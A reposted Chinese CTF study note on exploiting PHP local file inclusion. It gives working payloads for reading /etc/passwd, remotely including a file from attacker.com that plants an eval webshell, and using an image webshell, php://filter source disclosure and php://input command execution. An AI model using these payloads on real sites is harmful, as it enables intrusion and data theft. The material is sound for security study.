ctf學習筆記[轉載]
本地檔案包含的利用技巧\
1.讀取敏感檔案
訪問URL:http://www.xxser.com/index.php?page=/etc/passwd
如果目標主機檔案存在,並且有相應的許可權,那麼就可以讀出檔案的內容。反之,就會得到一個類似於;open_basedir restriction in effect的警告。\
2.遠端包含Shell
如果目標主機allow_url_fopen選項是啟用的,就可以嘗試遠端包含一句話木馬,如:http://www.attacker.com/echo.txt,程式碼如下:\
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>\
訪問:http://www.example.com/index.php?page=http://www.attacker.com/echo.txt。將會在index.php所在的目錄下生成shell.php,內容為:
<?php eval($_POST[xxser]);?>
3.本地包含配合檔案上傳
假設已經上傳一句話圖片木馬到伺服器,路徑為:/uploadfile/xxx.jpg
圖片程式碼如下:
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>
訪問URL:http://www.example.com/index.php?page=./uploadfile/xxx.jpg,包含這張圖片,將會在index.php所在的目錄下生成shell.php。\
4.使用PHP封裝協議
4.1 使用封裝協議讀取PHP檔案
例子如下:
http://www.example.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php
訪問URL,得到經過Base64加密後的字串,這段程式碼就是Base64加密過後的PHP原始碼,解密後就可得到原本的“樣貌”。
4.2 寫入PHP檔案
在allow_url_include為On時,構造URL:
http://www.example.com/index.php?page=php://input,並且提交資料為:<?php system('net user');?>
會得到net user命令的結果。\
5.包含Apache日誌檔案
本地檔案包含的利用。
Apache有兩個日誌檔案:access.log(訪問日誌)和error.log(錯誤日誌)。
攻擊者先訪問http://www.example.com/
相關文章
- [CTF/Web] PHP 反序列化學習筆記WebPHP筆記
- (轉載)ORACLE MODEL子句學習筆記Oracle筆記
- sed學習筆記(轉)筆記
- gurb學習筆記(轉)筆記
- ANT學習筆記 (轉)筆記
- GRUB學習筆記(轉)筆記
- TreeView學習筆記 (轉)View筆記
- SAP BASIS學習筆記(轉)筆記
- PE學習筆記(一) (轉)筆記
- AS 學習筆記 載入資料筆記
- JSP標記學習筆記 (轉)JS筆記
- repuest轉發學習筆記一筆記
- C#學習筆記(一) (轉)C#筆記
- 我的Hook學習筆記 (轉)Hook筆記
- Microsoft Agent 學習筆記 (一) (轉)ROS筆記
- 我的COM學習筆記 (轉)筆記
- APT HOWTO 學習筆記(轉)APT筆記
- 學習筆記:debfoster & deborphan(轉)筆記
- linux安全學習筆記(轉)Linux筆記
- numpy的學習筆記\pandas學習筆記筆記
- JVM學習筆記——類載入機制JVM筆記
- Python學習筆記 - 下載圖片Python筆記
- jvm學習筆記6:類載入器JVM筆記
- 【C#學習筆記】函式過載C#筆記函式
- php5學習系列筆記(連載)PHP筆記
- 多執行緒學習筆記 (轉)執行緒筆記
- sed 學習筆記(與大家共勉)(轉)筆記
- Win32學習筆記 序 (轉)Win32筆記
- STL的學習筆記之一 (轉)筆記
- <<軟體設計學習筆記>> (轉)筆記
- PMP學習筆記-溝通管理(轉)筆記
- 正規表示式學習筆記 (轉)筆記
- XML初學進階學習筆記(1)(轉)XML筆記
- XML初學進階學習筆記(5)(轉)XML筆記
- XML初學進階學習筆記(4)(轉)XML筆記
- XML初學進階學習筆記(3)(轉)XML筆記
- XML初學進階學習筆記(2)(轉)XML筆記
- IT學習筆記筆記